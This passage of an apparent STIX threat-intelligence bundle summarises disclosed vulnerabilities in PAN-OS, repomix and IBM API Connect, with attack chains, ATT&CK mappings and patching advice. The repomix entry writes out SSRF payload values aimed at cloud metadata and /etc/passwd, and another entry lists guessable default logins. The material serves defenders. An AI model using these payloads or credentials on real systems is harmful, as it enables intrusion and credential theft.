      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0280, an IPv6 packet processing vulnerability within the dataplane of PAN-OS® software, affecting versions 12.1, 11.2, 11.1, and 10.2, as well as Prisma Access 11.2.0 and 10.2.0. This flaw allows an unauthenticated attacker to bypass established firewall security policies, enabling network traffic that should otherwise be blocked to reach internal protected services. The vulnerability, described as CWE-131 (Incorrect Calculation of Buffer Size), requires IPv6 to be enabled on at least one interface of the affected firewall for exposure. There is currently no evidence of active exploitation in the wild, and Cloud NGFW and Panorama products are not impacted. This vulnerability matters for defenders as it can compromise network segmentation and expose internal assets to unauthorized access.\n\n## Attack Chain\n\n1. An unauthenticated remote attacker identifies a vulnerable Palo Alto Networks PAN-OS firewall with IPv6 enabled on at least one interface.\n2. The attacker crafts a specially designed or malformed IPv6 packet, exploiting an underlying \"Incorrect Calculation of Buffer Size\" (CWE-131) vulnerability.\n3. The crafted IPv6 packet is sent from the internet towards the external interface of the vulnerable PAN-OS firewall.\n4. During the dataplane processing of this malicious IPv6 packet, the PAN-OS software fails to correctly apply the configured security policies.\n5. The firewall erroneously permits the IPv6 packet to bypass rules that should block it, allowing it to traverse the firewall's perimeter.\n6. The malicious traffic reaches internal network segments and protected services that were intended to be isolated by the firewall.\n7. The attacker achieves unauthorized access to internal network resources, potentially leading to further reconnaissance, data exfiltration, or lateral movement.\n\n## Impact\n\nThis vulnerability can lead to unauthorized network access, as traffic that should be explicitly blocked by firewall policies is permitted to reach protected services. While the CVSS-B score indicates a low impact on confidentiality and integrity, the bypass could expose internal systems to attack, potentially leading to sensitive data exposure or compromise of internal infrastructure. The primary impact is the subversion of network segmentation controls, allowing attackers to access resources that were previously thought to be secured. Palo Alto Networks is not aware of any malicious exploitation of this issue.\n\n## Recommendation\n\n* Upgrade affected PAN-OS devices immediately to a patched version as specified in the CVE-2026-0280 advisory (e.g., upgrade PAN-OS 12.1 \u003c 12.1.4-h8 to 12.1.4-h8 or later).\n* Apply the necessary updates to Prisma Access versions if they are still vulnerable, referencing CVE-2026-0280 for specific upgrade paths.\n* As a temporary mitigation if immediate upgrade is not feasible, enable the \"Non SYN TCP Reject\" setting via the command `set deviceconfig setting session tcp-reject-non-syn yes` as described in the CVE-2026-0280 advisory.\n",
      "published": "2026-07-08T16:15:08Z",
      "labels": [
        "palo-alto-networks",
        "firewall",
        "vulnerability",
        "ipv6",
        "policy-bypass",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0280"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--58bcafe3-aa89-5ecd-9576-b6bbfb098dd7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ee39abcf-ef7a-5277-a8fa-26925a48f89c",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--07ede25d-7f5a-587a-9094-d2a972585085",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ee39abcf-ef7a-5277-a8fa-26925a48f89c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e35afd8-bc1c-5315-ad61-237e01040155",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ee39abcf-ef7a-5277-a8fa-26925a48f89c",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ee39abcf-ef7a-5277-a8fa-26925a48f89c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0286 PAN-OS: Authenticated Command Injection in CLI",
      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0286, an authenticated command injection vulnerability affecting the Command Line Interface (CLI) of its PAN-OS software. This flaw permits an authenticated administrator to execute arbitrary operating system commands with root privileges on vulnerable PA-Series and VM-Series firewalls, as well as Panorama management devices (both virtual and M-Series). The issue, discovered externally and published on July 8, 2026, impacts multiple versions of PAN-OS across 10.2, 11.1, 11.2, and 12.1 branches. While rated with medium severity, successful exploitation grants extensive control over the device. Palo Alto Networks is not aware of any in-the-wild exploitation at the time of disclosure, emphasizing a proactive patching approach to mitigate risk, especially where CLI access might be broadly granted.\n\n## Attack Chain\n\n1. An attacker obtains valid administrative credentials for a vulnerable Palo Alto Networks PAN-OS device (e.g., PA-Series, VM-Series firewall, or Panorama).\n2. The attacker establishes an authenticated Command Line Interface (CLI) session to the vulnerable PAN-OS device.\n3. The attacker crafts and submits a malicious input containing OS command injection payloads through the CLI.\n4. The vulnerable PAN-OS software, specifically due to CVE-2026-0286, fails to properly neutralize special elements within the attacker's CLI input.\n5. The injected operating system commands are executed by the underlying system with root privileges.\n6. The attacker achieves arbitrary OS command execution with root privileges on the compromised PAN-OS device.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-0286 allows an attacker, once authenticated, to gain root-level control over critical network security devices such as firewalls and centralized management systems. This can lead to severe consequences including, but not limited to, complete device compromise, unauthorized network access, configuration manipulation, data exfiltration, or disruption of network services. Given the high privileges obtained, the confidentiality and integrity of the affected device and potentially the networks it protects are at high risk. Palo Alto Networks has not observed active exploitation, but the potential for extensive damage necessitates immediate action.\n\n## Recommendation\n\n* Patch CVE-2026-0286 on all affected PAN-OS instances by upgrading to a remediated version as specified in the advisory references.\n* Restrict CLI access to only a limited, trusted group of administrators, as the issue requires prior authentication.\n* Enable Threat Prevention ID 510036 (from content version 9122-10145 and later) on devices with a Threat Prevention subscription, ensuring SSL Decryption is enabled for inbound traffic to the management interface for limited coverage against this vulnerability.\n",
      "published": "2026-07-08T16:16:14Z",
      "labels": [
        "vulnerability",
        "command-injection",
        "pan-os",
        "firewall",
        "network-device"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0286"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--edf07267-a556-5222-aaad-47ae51cb2367",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7da27c12-b572-5d36-9cd9-cb4719c0bfea",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a5d80af9-4453-5963-927e-8ce0d4b1f257",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7da27c12-b572-5d36-9cd9-cb4719c0bfea",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--86e6b03d-5da1-5d9c-bf93-3c5f8f81c7de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7da27c12-b572-5d36-9cd9-cb4719c0bfea",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7da27c12-b572-5d36-9cd9-cb4719c0bfea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0284 PAN-OS: XML Injection Vulnerability in Large Scale VPN (LSVPN)",
      "description": "## Overview\n\nAn XML injection vulnerability (CVE-2026-0284) exists in the Large Scale VPN (LSVPN) functionality of Palo Alto Networks PAN-OS software, allowing an unauthenticated attacker with network access to inject malicious XML content. This can lead to information disclosure or corruption of internal LSVPN satellite data. The vulnerability, discovered internally and published on July 8, 2026, impacts firewalls running specific versions of PAN-OS 10.2.x, 11.1.x, 11.2.x, and 12.1.x. Exposure is limited to devices actively using LSVPN with configured satellites. Palo Alto Networks is currently unaware of any malicious exploitation in the wild, but the low attack complexity and lack of user interaction make this a significant concern for vulnerable deployments, necessitating prompt patching to mitigate potential data compromise or service disruption.\n\n## Attack Chain\n\n1. An unauthenticated attacker gains network access to a vulnerable Palo Alto Networks PAN-OS firewall running LSVPN with configured satellites.\n2. The attacker identifies the LSVPN functionality exposed through GlobalProtect portals, which is susceptible to XML injection.\n3. The attacker crafts a specialized network request containing malicious XML content designed for injection into the LSVPN communication protocol.\n4. This crafted XML payload is transmitted to the vulnerable PAN-OS device's LSVPN interface via the network.\n5. Due to the XML injection vulnerability (CVE-2026-0284), the PAN-OS firewall incorrectly parses and processes the attacker's malicious XML.\n6. The injected XML leads to the unauthorized disclosure of sensitive internal LSVPN satellite configuration data from the firewall.\n7. Alternatively, the injected XML could result in the corruption of critical internal LSVPN satellite data, impacting the integrity and availability of VPN operations.\n\n## Impact\n\nIf successfully exploited, this vulnerability allows an unauthenticated attacker with network access to achieve information disclosure or corruption of internal LSVPN satellite data. While Palo Alto Networks reports no awareness of in-the-wild exploitation, the potential for unauthorized access to sensitive VPN configuration details or disruption of VPN services due to data corruption could severely impact an organization's network security and availability. The vulnerability has a CVSSv4 score of 7.8 (MEDIUM), with a high subsequent confidentiality impact, indicating that critical data could be exposed.\n\n## Recommendation\n\n* Upgrade affected Palo Alto Networks PAN-OS firewalls to the fixed versions provided for PAN-OS 10.2, 11.1, 11.2, and 12.1.\n* Ensure that Threat Prevention subscription customers enable Threat ID 510031 (from Applications and Threats content version 9122-10145 and later) and apply a vulnerability protection security profile to your GlobalProtect interface.\n* Check for LSVPN satellite configuration on your PAN-OS firewalls by running `show config running | match satellite` on the CLI to determine exposure to CVE-2026-0284.\n",
      "published": "2026-07-08T16:17:42Z",
      "labels": [
        "vulnerability",
        "xml-injection",
        "pan-os",
        "network-device"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0284"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1dce0c40-1346-55de-8e2f-34311db86c22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--efc40c6d-d06d-5330-bc00-18e9708b5e20",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--28d03a61-6721-5e78-9180-8568afb94860",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote System Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1018",
          "url": "https://attack.mitre.org/techniques/T1018"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4af861b-81da-54ff-bbbe-a38f4de31af2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--efc40c6d-d06d-5330-bc00-18e9708b5e20",
      "target_ref": "attack-pattern--28d03a61-6721-5e78-9180-8568afb94860"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--215f02c7-5309-53f3-958e-40363c4bc190",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--efc40c6d-d06d-5330-bc00-18e9708b5e20",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Cloud Storage",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--73318065-5b21-5d20-ad7d-1fef4073f9f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--efc40c6d-d06d-5330-bc00-18e9708b5e20",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--efc40c6d-d06d-5330-bc00-18e9708b5e20",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59702: repomix Server-Side Request Forgery",
      "description": "## Overview\n\nCVE-2026-59702 identifies a critical server-side request forgery (SSRF) vulnerability within the `repomix` software, specifically affecting its `POST /api/pack` endpoint. This flaw enables unauthenticated attackers to supply arbitrary URLs using `http://`, `https://`, and `file://` schemes. These malformed URLs are then processed by an internal `git clone` function without sufficient validation, causing the server to initiate connections to attacker-specified internal or external resources. The vulnerability, rated with a CVSS v3.1 base score of 9.3, presents a significant risk to organizations using `repomix`. Successful exploitation can expose sensitive internal network configurations, cloud metadata (such as from GCP), or local filesystem paths, leading to data exfiltration or further compromise.\n\n## Attack Chain\n\n1. **Vulnerable Service Identification:** An attacker identifies a publicly accessible instance of `repomix` exposing the `/api/pack` endpoint.\n2. **Malicious Request Crafting:** The attacker constructs a `POST` request to `/api/pack`, embedding a crafted URL as a parameter, such as `url=http://169.254.169.254/latest/meta-data/` or `url=file:///etc/passwd`.\n3. **Lack of Validation:** The `repomix` application receives the request and, due to improper input validation, accepts the malicious URL.\n4. **Internal Request Trigger:** The application's `git clone` function attempts to resolve and connect to the provided URL, initiating an arbitrary outbound request from the server's perspective.\n5. **Information Disclosure/Access:** The server connects to the internal resource (e.g., a private IP address, a cloud metadata service, or a local file path).\n6. **Data Exfiltration:** The attacker receives the response from the internal resource through the `repomix` application, gaining access to sensitive information like cloud credentials, internal service details, or configuration files.\n7. **Pivoting:** The attacker uses the gathered information to map the internal network, discover additional vulnerabilities, or escalate privileges within the compromised environment.\n\n## Impact\n\nThe impact of successful exploitation of CVE-2026-59702 is substantial, allowing unauthenticated attackers to perform extensive reconnaissance of internal network assets. This includes the ability to access sensitive cloud metadata services, such as those used by Google Cloud Platform (GCP), which can yield valuable credentials or configuration data. Furthermore, attackers can enumerate and potentially access local filesystem paths on the vulnerable server, leading to the exposure of configuration files, user data, or even arbitrary file read. This information disclosure can directly facilitate further compromise, data exfiltration, or lateral movement within an organization's infrastructure.\n\n## Recommendation\n\n* Immediately patch `repomix` to address CVE-2026-59702 as soon as a fix becomes available from the vendor.\n* Deploy the Sigma rule \"Detects CVE-2026-59702 Exploitation - repomix SSRF Attempt\" to your SIEM and tune for your environment to identify suspicious `POST` requests.\n* Enable comprehensive web server logging for `POST` request bodies and query parameters for any application exposing an `/api/pack` endpoint to capture potential exploitation attempts of this vulnerability.\n",
      "published": "2026-07-08T16:23:28Z",
      "labels": [
        "server-side-request-forgery",
        "ssrf",
        "cve",
        "webserver",
        "unauthenticated",
        "initial-access",
        "discovery"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--28d03a61-6721-5e78-9180-8568afb94860",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59702"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b529dcc7-02ea-5f79-9674-5347323d9efe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e3dfc97-953b-5a67-bd96-473e2ac7a2d2",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eab077cb-e753-5818-af49-f04b978b1f14",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e3dfc97-953b-5a67-bd96-473e2ac7a2d2",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a01ee162-87a7-5f25-b50f-2364c82709f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e3dfc97-953b-5a67-bd96-473e2ac7a2d2",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8e3dfc97-953b-5a67-bd96-473e2ac7a2d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unauthenticated SQL Injection in IBM API Connect (CVE-2026-9074)",
      "description": "## Overview\n\nA critical unauthenticated SQL injection vulnerability, tracked as CVE-2026-9074 (CVSS v3.1 Base Score: 9.1), affects IBM API Connect versions 10.0.8.0 through 10.0.8.9 and 12.1.0.0 through 12.1.0.3. This flaw resides within the password reset functionality of the API management platform, allowing a remote attacker to inject malicious SQL queries without requiring any prior authentication. Successful exploitation of this vulnerability could enable an attacker to bypass authentication mechanisms, gain unauthorized access to sensitive database information, or potentially manipulate data, posing a significant risk to the integrity and confidentiality of the affected systems and user accounts. Organizations utilizing the specified vulnerable versions of IBM API Connect are strongly urged to apply the available patches immediately to mitigate this severe risk.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies an exposed IBM API Connect instance running a vulnerable version (10.0.8.0-10.0.8.9 or 12.1.0.0-12.1.0.3).\n2. The attacker accesses the publicly available password reset functionality of the IBM API Connect web interface.\n3. The attacker crafts and submits a specially malformed request to the password reset endpoint, embedding SQL injection payloads within input fields or parameters that are processed by the application's backend database.\n4. The vulnerable application processes the malicious input without proper sanitization, leading to the execution of the attacker's arbitrary SQL commands within the database.\n5. Depending on the crafted payload, the attacker might retrieve sensitive information from the database (e.g., user credentials, API keys) or bypass authentication to gain unauthorized access to user accounts.\n6. Upon successful data exfiltration or authentication bypass, the attacker can leverage the compromised credentials or access tokens for further malicious activities within the API Connect environment.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-9074 can lead to severe consequences for organizations. Due to the unauthenticated nature of the vulnerability, any attacker can initiate the exploitation. The primary impacts include unauthorized access to sensitive data stored in the backend database, such as user account details, API configurations, or other critical system information. Attackers could also achieve authentication bypass, gaining full control over administrative or user accounts within the IBM API Connect instance. This could lead to further compromise of managed APIs, data exfiltration, service disruption, or unauthorized modification of system settings, severely compromising the confidentiality and integrity of the API management platform and the services it exposes.\n\n## Recommendation\n\n* Patch CVE-2026-9074 immediately by updating IBM API Connect to a fixed version beyond 10.0.8.9 or 12.1.0.3, as described in the IBM support advisories referenced.\n* Deploy the Sigma rule \"Detect CVE-2026-9074 Exploitation Attempt - IBM API Connect SQL Injection\" to your SIEM and tune for your environment to detect attempts against the password reset functionality.\n* Monitor web server logs for suspicious requests to password reset endpoints containing common SQL injection patterns.\n",
      "published": "2026-07-08T16:24:32Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "critical-vulnerability",
        "api-management"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9074"
        },
        {
          "source_name": "reference",
          "url": "https://www.ibm.com/support/pages/node/7278218"
        },
        {
          "source_name": "reference",
          "url": "https://www.ibm.com/support/pages/node/7278909"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--85982b83-838b-561c-a8b2-a70d80a2c572",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2cf6ef90-02a2-5cc0-b688-6a3d619c7bef",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2cf6ef90-02a2-5cc0-b688-6a3d619c7bef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-3144 - IBM API Connect Default Credentials Vulnerability",
      "description": "## Overview\n\nIBM has disclosed CVE-2026-3144, affecting IBM API Connect versions 12.1.0.0 through 12.1.0.3. This critical vulnerability stems from the application's use of default credentials, which attackers can leverage to gain unauthorized access. The issue allows threat actors to bypass authentication mechanisms before the system enforces a mandatory credential update. This provides a straightforward initial access vector, enabling adversaries to potentially control API configurations, access sensitive data, or establish further persistence within compromised environments. Organizations utilizing the affected versions should prioritize immediate remediation to prevent unauthorized exploitation and mitigate the risk of severe operational and data security impacts.\n\n## Attack Chain\n\n1. Attacker conducts reconnaissance to identify internet-facing IBM API Connect instances within versions 12.1.0.0 through 12.1.0.3.\n2. Attacker attempts to authenticate to the identified API Connect management interface (e.g., via the login endpoint) using commonly known default usernames and passwords (e.g., 'admin'/'admin', 'user'/'password').\n3. Due to the vulnerability (CWE-1392), the application successfully authenticates the attacker using the hardcoded or easily guessable default credentials.\n4. Attacker gains full unauthorized access to the IBM API Connect management console and its functionalities, inheriting privileges associated with the default account.\n5. Attacker performs actions such as modifying API definitions, creating new APIs, or accessing API analytics and sensitive configuration data.\n6. The unauthorized access could enable sensitive data exposure, API manipulation, or the establishment of a foothold for lateral movement into connected internal systems.\n\n## Impact\n\nExploitation of CVE-2026-3144 grants an unauthenticated attacker high privileges over the IBM API Connect platform, as indicated by its CVSS 3.1 score of 8.1. If successfully exploited, adversaries can gain complete control over API management, potentially leading to widespread disruption of services, unauthorized data access or exfiltration, and the creation of backdoors for future access. Organizations managing critical business APIs via affected versions face significant risks, including reputational damage, compliance failures, and severe operational interruptions if their API infrastructure is compromised. The vulnerability applies to any organization using the specified versions of IBM API Connect.\n\n## Recommendation\n\n- Immediately apply patches or upgrade IBM API Connect to a version that remediates CVE-2026-3144 as per the vendor advisory `https://www.ibm.com/support/pages/node/7278909`.\n- Ensure all default credentials for IBM API Connect instances are changed to strong, unique passwords immediately upon deployment and configuration.\n- Implement robust monitoring for all authentication attempts, specifically looking for successful logins by default or newly created privileged accounts from unusual source IP addresses or locations within your webserver category logs.\n- Review access logs for the IBM API Connect management interface (from your webserver logs) for suspicious login patterns or unauthorized API manipulation attempts.\n",
      "published": "2026-07-08T16:25:27Z",
      "labels": [
        "vulnerability-exploitation",
        "default-credentials",
        "ibm",
        "api-connect",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3144"
        },
        {
          "source_name": "reference",
          "url": "https://www.ibm.com/support/pages/node/7278909"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e726a1a9-5622-5f50-ac9e-3b964d310271",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detecting Hostile Prompt Sentiment in AWS Bedrock Claude",
